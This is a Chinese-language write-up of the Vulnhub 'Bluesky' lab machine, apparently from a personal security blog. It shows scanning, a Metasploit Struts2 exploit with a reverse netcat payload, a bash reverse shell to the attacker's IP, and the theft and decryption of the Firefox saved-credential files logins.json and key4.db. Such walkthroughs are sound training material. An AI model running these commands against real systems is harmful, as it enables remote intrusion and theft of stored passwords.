Bluesky
识别目标主机IP地址
该靶机存在无法从VirtualBox自动获取IP的问题,解决过程见本人另文,此处不再赘述。
┌──(kali㉿kali)-[~/Vulnhub/Bluesky]
└─$ sudo netdiscover -i eth
Currently scanning: 192.168.59.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:11 1 60 Unknown vendor
192.168.56.100 08:00:27:81:a1:ab 1 60 PCS Systemtechnik GmbH
192.168.56.115 08:00:27:47:f4:47 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.115
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/Bluesky]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.115 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-13 21:55 EST
Nmap scan report for localhost (192.168.56.115)
Host is up (0.00011s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 19:45:ec:5c:59:46:c8:26:b5:a3:30:d9:2f:79:ac:85 (RSA)
| 256 18:d1:aa:64:f7:f3:6f:8c:91:82:09:57:0f:07:d2:d2 (ECDSA)
|_ 256 8e:50:a9:c7:1b:23:e2:68:56:0f:fa:59:2a:0a:e0:3e (ED25519)
8080/tcp open http Apache Tomcat 9.0.40
|_http-title: Apache Tomcat/9.0.40
|_http-favicon: Apache Tomcat
|_http-open-proxy: Proxy might be redirecting requests
MAC Address: 08:00:27:47:F4:47 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.84 seconds
Get Access
目标主机有两个开放端口22(SSH服务)、8080(HTTP服务),由于SSH服务没有可利用的漏洞,接下来主要围绕HTTP服务展开信息收集:
利用Kali LInux自带浏览器访问8080端口,返回Tomcat默认页面:
┌──(kali㉿kali)-[~/Vulnhub/Bluesky]
└─$ curl http://192.168.56.115:8080/robots.txt
<!doctype html><html lang="en"><head><title>HTTP Status 404 – Not Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 – Not Found</h1><hr class="line" /><p><b>Type</b> Status Report</p><p><b>Message</b> The requested resource [/robots.txt] is not available</p><p><b>Description</b> The origin server did not find a current representation for the target resource or is not willing to disclose that one exists.</p><hr class="line" /><h3>Apache Tomcat/9.0.40</h3></body></html>
┌──(kali㉿kali)-[~/Vulnhub/Bluesky]
└─$ gobuster dir -u http://192.168.56.115:8080 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.115:8080
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Timeout: 10s
===============================================================
2022/11/13 21:59:50 Starting gobuster in directory enumeration mode
===============================================================
/docs (Status: 302) [Size: 0] [--> /docs/]
/examples (Status: 302) [Size: 0] [--> /examples/]
/manager (Status: 302) [Size: 0] [--> /manager/]
/http%3A%2F%2Fwww (Status: 400) [Size: 804]
/http%3A%2F%2Fyoutube (Status: 400) [Size: 804]
/http%3A%2F%2Fblogs (Status: 400) [Size: 804]
/http%3A%2F%2Fblog (Status: 400) [Size: 804]
/**http%3A%2F%2Fwww (Status: 400) [Size: 804]
/External%5CX-News (Status: 400) [Size: 795]
/http%3A%2F%2Fcommunity (Status: 400) [Size: 804]
/http%3A%2F%2Fradar (Status: 400) [Size: 804]
/http%3A%2F%2Fjeremiahgrossman (Status: 400) [Size: 804]
/http%3A%2F%2Fweblog (Status: 400) [Size: 804]
/http%3A%2F%2Fswik (Status: 400) [Size: 804]
===============================================================
2022/11/13 22:00:43 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Bluesky]
└─$ dirb http://192.168.56.115:8080
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sun Nov 13 22:39:01 2022
URL_BASE: http://192.168.56.115:8080/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.56.115:8080/ ----
+ http://192.168.56.115:8080/docs (CODE:302|SIZE:0)
+ http://192.168.56.115:8080/examples (CODE:302|SIZE:0)
+ http://192.168.56.115:8080/favicon.ico (CODE:200|SIZE:21630)
+ http://192.168.56.115:8080/host-manager (CODE:302|SIZE:0)
+ http://192.168.56.115:8080/manager (CODE:302|SIZE:0)
-----------------
END_TIME: Sun Nov 13 22:39:04 2022
DOWNLOADED: 4612 - FOUND: 5
┌──(kali㉿kali)-[~/Vulnhub/Bluesky]
└─$ curl http://192.168.56.115:8080/manager/
目录扫描虽然识别出/manager/,但是返回该目录没有结果。
查了一下其他人的做法,说该靶机的struts存在漏洞
Struts2:是apache项目下的一个web 框架
漏洞涉及Struts2.0及以上的版本,是一个远程命令执行漏洞和开放重定向漏洞。利用漏洞,黑客可发起远程攻击,不但可以窃取网站数据信息,甚至还可取得网站服务器控制权
奇怪,前面目录扫描并没有扫描出struts2
msf6 > search struts
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/http/struts_default_action_mapper 2013-07-02 excellent Yes Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution
1 exploit/multi/http/struts_dev_mode 2012-01-06 excellent Yes Apache Struts 2 Developer Mode OGNL Execution
2 exploit/multi/http/struts2_multi_eval_ognl 2020-09-14 excellent Yes Apache Struts 2 Forced Multi OGNL Evaluation
3 exploit/multi/http/struts2_namespace_ognl 2018-08-22 excellent Yes Apache Struts 2 Namespace Redirect OGNL Injection
4 exploit/multi/http/struts2_rest_xstream 2017-09-05 excellent Yes Apache Struts 2 REST Plugin XStream RCE
5 exploit/multi/http/struts2_code_exec_showcase 2017-07-07 excellent Yes Apache Struts 2 Struts 1 Plugin Showcase OGNL Code Execution
6 exploit/multi/http/struts_code_exec_classloader 2014-03-06 manual No Apache Struts ClassLoader Manipulation Remote Code Execution
7 exploit/multi/http/struts_dmi_exec 2016-04-27 excellent Yes Apache Struts Dynamic Method Invocation Remote Code Execution
8 exploit/multi/http/struts2_content_type_ognl 2017-03-07 excellent Yes Apache Struts Jakarta Multipart Parser OGNL Injection
9 exploit/multi/http/struts_code_exec_parameters 2011-10-01 excellent Yes Apache Struts ParametersInterceptor Remote Code Execution
10 exploit/multi/http/struts_dmi_rest_exec 2016-06-01 excellent Yes Apache Struts REST Plugin With Dynamic Method Invocation Remote Code Execution
11 exploit/multi/http/struts_code_exec 2010-07-13 good No Apache Struts Remote Command Execution
12 exploit/multi/http/struts_code_exec_exception_delegator 2012-01-06 excellent No Apache Struts Remote Command Execution
13 exploit/multi/http/struts_include_params 2013-05-24 great Yes Apache Struts includeParams Remote Code Execution
14 auxiliary/scanner/http/log4shell_scanner 2021-12-09 normal No Log4Shell HTTP Scanner
Interact with a module by name or index. For example info 14, use 14 or use auxiliary/scanner/http/log4shell_scanner
msf6 > use exploit/multi/http/struts2_code_exec_showcase
[*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp
msf6 exploit(multi/http/struts2_code_exec_showcase) > show options
Module options (exploit/multi/http/struts2_code_exec_showcase):
Name Current Setting Required Description
---- --------------- -------- -----------
POSTPARAM name yes The HTTP POST parameter
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wik
i/Using-Metasploit
RPORT 8080 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /struts2-showcase/integration/saveGangste yes The path to a struts application action
r.action
VHOST no HTTP server virtual host
Payload options (cmd/unix/python/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.0.2.15 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Universal
msf6 exploit(multi/http/struts2_code_exec_showcase) > set RHOSTS 192.168.56.115
RHOSTS => 192.168.56.115
msf6 exploit(multi/http/struts2_code_exec_showcase) > set LHOST 192.168.56.107
LHOST => 192.168.56.107
msf6 exploit(multi/http/struts2_code_exec_showcase) > set LPORT 5555
LPORT => 5555
msf6 exploit(multi/http/struts2_code_exec_showcase) > exploit
[*] Started reverse TCP handler on 192.168.56.107:5555
[+] Command executed
msf6 exploit(multi/http/struts2_code_exec_showcase) > show options
Module options (exploit/multi/http/struts2_code_exec_showcase):
Name Current Setting Required Description
---- --------------- -------- -----------
POSTPARAM name yes The HTTP POST parameter
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.56.115 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wik
i/Using-Metasploit
RPORT 8080 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /struts2-showcase/integration/saveGangste yes The path to a struts application action
r.action
VHOST no HTTP server virtual host
Payload options (cmd/unix/python/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.56.107 yes The listen address (an interface may be specified)
LPORT 5555 yes The listen port
Exploit target:
Id Name
-- ----
0 Universal
msf6 exploit(multi/http/struts2_code_exec_showcase) > set payload /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:11: warning: already initialized constant HrrRbSsh::Transport::ServerHostKeyAlgorithm::EcdsaSha2Nistp256::NAME
msf6 exploit(multi/http/struts2_code_exec_showcase) > set payload cmd/unix/
cmd/unix/reverse_tclsh
set payload cmd/unix/python/pingback_bind_tcp set payload cmd/unix/reverse_zsh
msf6 exploit(multi/http/struts2_code_exec_showcase) > set payload cmd/unix/reverse_netcat
payload => cmd/unix/reverse_netcat
msf6 exploit(multi/http/struts2_code_exec_showcase) > show options
Module options (exploit/multi/http/struts2_code_exec_showcase):
Name Current Setting Required Description
---- --------------- -------- -----------
POSTPARAM name yes The HTTP POST parameter
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.56.115 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wik
i/Using-Metasploit
RPORT 8080 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /struts2-showcase/integration/saveGangste yes The path to a struts application action
r.action
VHOST no HTTP server virtual host
Payload options (cmd/unix/reverse_netcat):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.56.107 yes The listen address (an interface may be specified)
LPORT 5555 yes The listen port
Exploit target:
Id Name
-- ----
0 Universal
msf6 exploit(multi/http/struts2_code_exec_showcase) > run
[*] Started reverse TCP handler on 192.168.56.107:5555
[*] Command shell session 1 opened (192.168.56.107:5555 -> 192.168.56.115:57714) at 2022-11-13 22:51:19 -0500
id
[-] Exploit aborted due to failure: unknown: Exploit failed.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/http/struts2_code_exec_showcase) > id
[*] exec: id
uid=0(root) gid=0(root) groups=0(root)
msf6 exploit(multi/http/struts2_code_exec_showcase) > shell
[-] Unknown command: shell
msf6 exploit(multi/http/struts2_code_exec_showcase) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell cmd/unix 192.168.56.107:5555 -> 192.168.56.115:57714 (192.168.56.115)
msf6 exploit(multi/http/struts2_code_exec_showcase) > sessions 1
[*] Starting interaction with 1...
id
uid=1000(minhtuan) gid=1000(minhtuan) groups=1000(minhtuan),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),114(lpadmin),115(sambashare)
bash -c 'bash -i >& /dev/tcp/192.168.56.107/6666 0>&1'
得到shell以后,由于担心不稳定,再另行spawn一个shell
└─$ sudo nc -nlvp 6666
[sudo] password for kali:
listening on [any] 6666 ...
connect to [192.168.56.107] from (UNKNOWN) [192.168.56.115] 37544
bash: cannot set terminal process group (648): Inappropriate ioctl for device
bash: no job control in this shell
minhtuan@ubuntu:~$ id
id
uid=1000(minhtuan) gid=1000(minhtuan) groups=1000(minhtuan),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),114(lpadmin),115(sambashare)
minhtuan@ubuntu:~$ ls
ls
Desktop
Documents
Downloads
Music
myWebApp
Pictures
Public
struts2
Templates
user.txt
velocity.log
Videos
minhtuan@ubuntu:~$ cat user.txt
cat user.txt
Try your best, you have passed the first challenge, and the last one is for you, root me!
minhtuan@ubuntu:~$
提权
在网上找到firefox浏览器存储用户名密码的文件是logins.json(版本号小于等于32.0)或者signons.sqlite
minhtuan@ubuntu:~/.mozilla$ find / -name logins.json 2>/dev/null
find / -name logins.json 2>/dev/null
/home/minhtuan/.mozilla/firefox/fvbljmev.defaultgelease/logins.jsong
该文件是加密的,需要用工具破解
┌──(kali㉿kali)-[~/Vulnhub/Bluesky]
└─$ git clone https://github.com/lclevy/firepwd.git
Cloning into 'firepwd'...
remote: Enumerating objects: 88, done.
remote: Counting objects: 100% (8/8), done.
remote: Compressing objects: 100% (8/8), done.
remote: Total 88 (delta 2), reused 3 (delta 0), pack-reused 80
Receiving objects: 100% (88/88), 239.08 KiB | 383.00 KiB/s, done.
Resolving deltas: 100% (41/41), done.
┌──(kali㉿kali)-[~/Vulnhub/Bluesky]
└─$ ls
firepwd nmap_full_scan
┌──(kali㉿kali)-[~/Vulnhub/Bluesky]
└─$ cd firepwd
┌──(kali㉿kali)-[~/Vulnhub/Bluesky/firepwd]
└─$ ls
firepwd.py LICENSE mozilla_db mozilla_pbe.pdf mozilla_pbe.svg readme.md requirements.txt
┌──(kali㉿kali)-[~/Vulnhub/Bluesky/firepwd]
└─$ pip -r requirements.txt
Usage:
pip <command> [options]
no such option: -r
┌──(kali㉿kali)-[~/Vulnhub/Bluesky/firepwd]
└─$ pip install -r requirements.txt
在靶机启用http,将logins.json以及key4.db下载到Kali Linux
<firefox/fvbljmev.default-release$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 ...
┌──(kali㉿kali)-[~/Vulnhub/Bluesky]
└─$ wget http://192.168.56.115:8000/logins.json
--2022-11-13 23:08:51-- http://192.168.56.115:8000/logins.json
Connecting to 192.168.56.115:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 660 [application/json]
Saving to: ‘logins.json’
logins.json 100%[==================================================================>] 660 --.-KB/s in 0.02s
2022-11-13 23:08:51 (35.8 KB/s) - ‘logins.json’ saved [660/660]
┌──(kali㉿kali)-[~/Vulnhub/Bluesky]
└─$ wget http://192.168.56.115:8000/key4.db
--2022-11-13 23:08:57-- http://192.168.56.115:8000/key4.db
Connecting to 192.168.56.115:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 294912 (288K) [application/octet-stream]
Saving to: ‘key4.db’
key4.db 100%[==================================================================>] 288.00K --.-KB/s in 0.04s
2022-11-13 23:08:57 (7.60 MB/s) - ‘key4.db’ saved [294912/294912]
┌──(kali㉿kali)-[~/Vulnhub/Bluesky]
└─$ ls
firepwd key4.db logins.json nmap_full_scan
┌──(kali㉿kali)-[~/Vulnhub/Bluesky/firepwd]
└─$ python firepwd.py
globalSalt: b'5932ff5878417b64a4049f8d9ce7b3ab247fde15'
SEQUENCE {
SEQUENCE {
OBJECTIDENTIFIER 1.2.840.113549.1.5.13 pkcs5 pbes2
SEQUENCE {
SEQUENCE {
OBJECTIDENTIFIER 1.2.840.113549.1.5.12 pkcs5 PBKDF2
SEQUENCE {
OCTETSTRING b'5a7912074f9ddf6b381316126704a5479794dcf75aca047f45e2b54b3f0e6d79'
INTEGER b'01'
INTEGER b'20'
SEQUENCE {
OBJECTIDENTIFIER 1.2.840.113549.2.9 hmacWithSHA256
}
}
}
SEQUENCE {
OBJECTIDENTIFIER 2.16.840.1.101.3.4.1.42 aes256-CBC
OCTETSTRING b'7366afcc6bf9cacc1fa25fa3961a'
}
}
}
OCTETSTRING b'1c74cace1e1e37252aea0d28aafb2399'
}
clearText b'70617373776f72642d636865636b0202'
password check? True
SEQUENCE {
SEQUENCE {
OBJECTIDENTIFIER 1.2.840.113549.1.5.13 pkcs5 pbes2
SEQUENCE {
SEQUENCE {
OBJECTIDENTIFIER 1.2.840.113549.1.5.12 pkcs5 PBKDF2
SEQUENCE {
OCTETSTRING b'c0c32a0189ed3b0db160c739a54c821da4fd5572d3ee79cb36533bc7d11a49d0'
INTEGER b'01'
INTEGER b'20'
SEQUENCE {
OBJECTIDENTIFIER 1.2.840.113549.2.9 hmacWithSHA256
}
}
}
SEQUENCE {
OBJECTIDENTIFIER 2.16.840.1.101.3.4.1.42 aes256-CBC
OCTETSTRING b'4b11e722902bc3a1bf51be57de22'
}
}
}
OCTETSTRING b'c6158b0d1e7a81ce468f9d24624daa581ee8095b6f4596242ef2dbf30b300b5b'
}
clearText b'540b76c41a46b9dcecc4c15449c785011546bcf84cfe9b700808080808080808'
decrypting login/password pairs
https://twitter.com:b'minhtuan',b'skysayohyeah'
得到用户名和密码: minhtuan以及skysayohyeah